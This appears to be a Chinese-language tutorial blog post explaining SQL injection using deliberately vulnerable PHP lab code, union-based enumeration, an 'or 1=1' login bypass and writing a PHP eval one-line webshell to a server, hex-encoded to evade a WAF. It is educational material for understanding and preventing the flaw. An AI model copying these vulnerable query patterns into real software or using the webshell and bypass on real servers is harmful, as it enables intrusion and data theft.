SQL注入漏洞原理

前言

SQL注入漏洞一直都是所有漏洞排名的榜首，虽然网上有很多教程，但是还是得自己真正了解其代码原理和漏洞原理才能真正预防。因此我借此用PHP代码还原简单的SQL漏洞原理。
漏洞复现之前，我们必须先安装phpmyadmin，然后创建一个有数据的数据库和数据表

漏洞原理

数字型注入

<?php
    $id = $_GET['id'];
    $conn = mysql_connect('localhost','root','root');
    mysql_select_db('admin',$conn);
    $sql = "SELECT * FROM user WHERE id =$id";
    $result = mysql_query($sql) or die(mysql_error());
    while ($row = mysql_fetch_array($result)){
        echo "ID" .$row['id']."<br>";
        echo "USERNAME".$row['username']."<br>";
        echo "PASSWORD".$row['password']."<br>";
        echo "EMAIL".$row['email']."<br>";
    }
    mysql_close($conn);
    echo "<hr>";
    echo $sql;
    ?>

这里的代码是先从用户那获取id，然后拼接到sql语句中，执行sql语句，若sql有误则输出一条错误信息并退出脚本，然后执行while循环分别打印用户信息，最后关闭数据库节省资源，打印出执行的sql语句。

执行效果


可以看到，当and语句结果为真时，数据库正确执行了查询，当为假时，数据库没有返回任何信息，因此可以判断是数字型注入

字符型注入

<?php
    $id = $_GET['id'];
    $conn = mysql_connect('localhost','root','root');
    mysql_select_db('admin',$conn);
    $sql = "SELECT * FROM user WHERE id ='$id'";
    $result = mysql_query($sql) or die(mysql_error());
    while ($row = mysql_fetch_array($result)){
        echo "ID" .$row['id']."<br>";
        echo "USERNAME".$row['username']."<br>";
        echo "PASSWORD".$row['password']."<br>";
        echo "EMAIL".$row['email']."<br>";
    }
    mysql_close($conn);
    echo "<hr>";
    echo $sql;
    ?>

• 执行效果
  
  
  
  可以看到字符型注入与数字型注入的区别是，字符型注入把一整条语句都当成了参数传进数据库中，这里解释一下为什么1 and 1=2还能查询到id=1的信息。原因是id的类型为数值型，而查询的时候传入的是字符串，而MYSQL是十分智能的，它会进行类型转换，但是这个转换过程是很随意的，就像varchar 的’1 and 1=2’会被强制转换为1。因此闭合前面单引号和注释后面的单引号就能判断这是个字符型注入漏洞了。

实行注入查询数据库中的信息

1. 使用order by语句判断总共有四个字段
   
2. 再用union语句注入查询信息
   

漏洞利用

我们可以利用这个SQL注入漏洞进行对目标服务器写入一个一句话木马文件。首先我们先使用小葵一句话木马编码为16进制，目的是绕过WAF等一些防火墙。

一句话木马的内容是<?php @eval($_REQUEST['a']);?>
eval可以用来执行任何其他php代码，将hex中的内容粘贴进去url中，并加上写入的路径

2. 使用菜刀进行连接，可以看到服务器中的文件目录了
   
   

基于POST表单的SQL注入

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<body>
    <form action="login.php" method="post">
        账号:<input type="text" name="username"><br />
        密码:<input type="text" name="password"><br />
        <input type="submit" value="点击登录" name="login">
    </form>
</body>
</html>

<?php
    if(!isset($_POST['login'])){
        echo "fail";
    }else{
        $username = $_POST['username'];
        $password = $_POST['password'];
        $conn = mysql_connect("localhost","root","root");
        mysql_select_db("admin",$conn);
        $sql = "SELECT * FROM USER WHERE username='".$username."'";
        $result = mysql_query($sql) or die(mysql_error());
        while($row = mysql_fetch_array($result)){
            $db_username = $row['username'];
            $db_password = $row['password'];
        }
        if($db_password == $password && $db_username = $username){
            echo "success";
        }else{
            echo "fail";
        }
    }
    ?>

在我们正确输入或者错误输入账户的用户名和密码时，它都会返回success或者fail，但是当我们在账户中输入or 1=1时，数据库返回success

原因是当我们这么输入的时候，数据库拼接后的语句是select * from user where username='' or 1=1，这个就是万能密码的原理，因为你前面为空，但是后面的or语句恒为真，所以完成了注入。

• 这里使用burpsuite抓包，sqlmap验证了这个是一个POST注入漏洞
  

总结：SQL注入过程一般是攻击者先访问登录服务器，输入用户名及密码，将含有攻击字符串组成SQL语句转发给数据库执行，数据库执行发回用户服务器，应用程序将内容返回浏览器即绕过成功。